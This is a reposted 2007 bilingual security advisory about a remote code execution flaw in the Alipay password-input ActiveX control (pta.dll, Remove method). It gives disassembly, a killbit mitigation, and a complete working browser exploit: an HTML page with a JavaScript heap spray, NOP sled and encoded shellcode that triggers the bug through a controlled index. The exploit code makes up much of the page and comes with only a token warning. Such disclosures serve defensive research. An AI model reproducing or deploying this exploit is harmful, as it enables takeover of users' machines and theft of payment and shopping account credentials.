阿里巴巴支付宝远程代码执行漏洞,附exploit

Feb 8

watson , 10:51 , 学习笔记 , 评论(0) , 引用(0) , 阅读(1809) , Via 本站原创

(English version is at the end of this artical.)
原作者：cocoruder 出处：http://ruder.cdut.net/blogview.asp?logID=168

Summary:
支付宝是由阿里巴巴公司出品的在线支付解决方案，在中国拥有众多用户，更多信息请参考：
https://www.alipay.com
在支付宝密码输入控件中存在一个远程代码执行漏洞，远程攻击者可利用此漏洞在被攻击者系统上执行任意代码，进而可安装木马以及间谍程序，窃取相关敏感信息比如淘宝帐号/密码，或者支付宝帐号/密码。

Affected Software Versions:
当前所有版本

Details:
漏洞存在于由ActiveX控件"pta.dll"导出的"Remove()"函数中，相关信息如下：

引用

InprocServer32: pta.dll
ClassID : 66F50F46-70A0-4A05-BD5E-FBCC0F9641EC

[id(0x60030001), helpstring("method Remove")]
void Remove([in] int idx);

直接看Remove()函数的处理流程：

.text:10003D4E; Remove
.text:10003D4E
.text:10003D4E sub_10003D4E proc near ; DATA XREF: .rdata:1000B3A4o
.text:10003D4E ; .rdata:1000B41Co ...
.text:10003D4E
.text:10003D4E arg_0 = dword ptr 4
.text:10003D4E arg_4 = dword ptr 8
.text:10003D4E
.text:10003D4E mov eax, [esp+arg_4]
.text:10003D52 test eax, eax
.text:10003D54 jl short loc_10003D78
.text:10003D56 push esi
.text:10003D57 mov esi, [esp+4+arg_0] ; get idx
.text:10003D5B shl eax, 4 ; idx << 4
.text:10003D5E add eax, [esi+8] ; [esi+8]=0
.text:10003D61 push edi ;
.text:10003D62 mov edi, eax ; idx << 4 ==>edi
.text:10003D64 mov eax, [edi+8] ; [(idx << 4)+8] ==>eax
.text:10003D67 push eax
.text:10003D68 mov ecx, [eax] ; [[(idx << 4)+8]]==>ecx
.text:10003D6A call dword ptr [ecx+8] ; [[[(idx << 4)+8]]+8]==>jmp addr
.text:10003D6D push edi
.text:10003D6E lea ecx, [esi+4]
.text:10003D71 call sub_10003F35
.text:10003D76 pop edi
.text:10003D77 pop esi
.text:10003D78
.text:10003D78 loc_10003D78: ; CODE XREF: sub_10003D4E+6j
.text:10003D78 xor eax, eax
.text:10003D7A retn 8
.text:10003D7A sub_10003D4E endp

idx是我们可以控制的，因此可以完成有意思的攻击，比如我们设置的idx为0x41414141，程序会执行[[[14141410h+8]]+8]地址的代码。

Solution:
建议用户通过注册表对相应的CLSID设置Killbit，如不使用支付宝可到%system%\aliedit\目录下删除pta.dll

Disclosure Timeline:
2007.02.07 发布公告

Attached File:
这里给出一个用大内存分配实现的exp，把所有需访问其值的地址都置成0x0d0d0d0d，可以很好地达到攻击效果。
警告：此exp只为展示此漏洞存在，请务用于其它用途。

/************************************************************************************************
Alipay ActiveX Remote Code Execute Exploit,enjoy it:)
by cocoruder(frankruder_at_hotmail.com)
http://ruder.cdut.net
*************************************************************************************************/

<html>
<head>
<OBJECT ID="com" CLASSID="CLSID:{66F50F46-70A0-4A05-BD5E-FBCC0F9641EC}"></OBJECT>
</head>
<body>

<SCRIPT language="javascript">

function ClickForRunCalc()
{
var heapSprayToAddress = 0x0d0d0d0d;

var payLoadCode = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090"+"%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");

var heapBlockSize = 0x400000;

var payLoadSize = payLoadCode.length * 2;

var spraySlideSize = heapBlockSize - (payLoadSize+0x38);

var spraySlide = unescape("%u0d0d%u0d0d");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);

heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;

memory = new Array();

for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}

com.Remove(0x00d0d0d0);

function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}

}
</script>
<button onclick="javascript:ClickForRunCalc();">ClickForRunCalc</button>
</body>
</html>

-----The Following is English Version------
transfered from http://ruder.cdut.net/blogview.asp?logID=167

Alibaba Alipay Remote Code Execute Vulnerability

Summary:

Alipay is China’s leading online payment service, and a division of Alibaba.com. It enables individuals and businesses to securely, easily and quickly send and receive payments online. Alipay works like an escrow service, solving the issue of settlement risk in China. More details:

https://www.alipay.com

There exists a remote code execute vulnerability in alipay's passsword input control "pta.dll". A remote attacker who successfully exploit these vulnerabilities can completely take control of the affected system.

Affected Software Versions:
All current versions

Details:
This vulnerability exist in the function "Remove()" educed by "pta.dll", following are some related imformations:

引用

InprocServer32: pta.dll
ClassID : 66F50F46-70A0-4A05-BD5E-FBCC0F9641EC

[id(0x60030001), helpstring("method Remove")]
void Remove([in] int idx);

Let's see How function "Remove()" process the parameter "idx"：

The idx is a DWORD vaule what we can control, so we can complete an interesting attack, for example when we set the idx 0x41414141, the procedure will execute codes of address [[[14141410h+8]]+8].

Solution:
Set a killbit for "pta.dll", or, delete %system%\aliedit\pta.dll if you do not use Alipay.

Disclosure Timeline:
2007.02.07 Advisory release

Attached File:
Here give an exploit, we se all address 0x0d0d0d0d which will access its value, can gain attack result nicely.
Warning: This exploit is just used for reproducing the vulnerability, please do not used for others.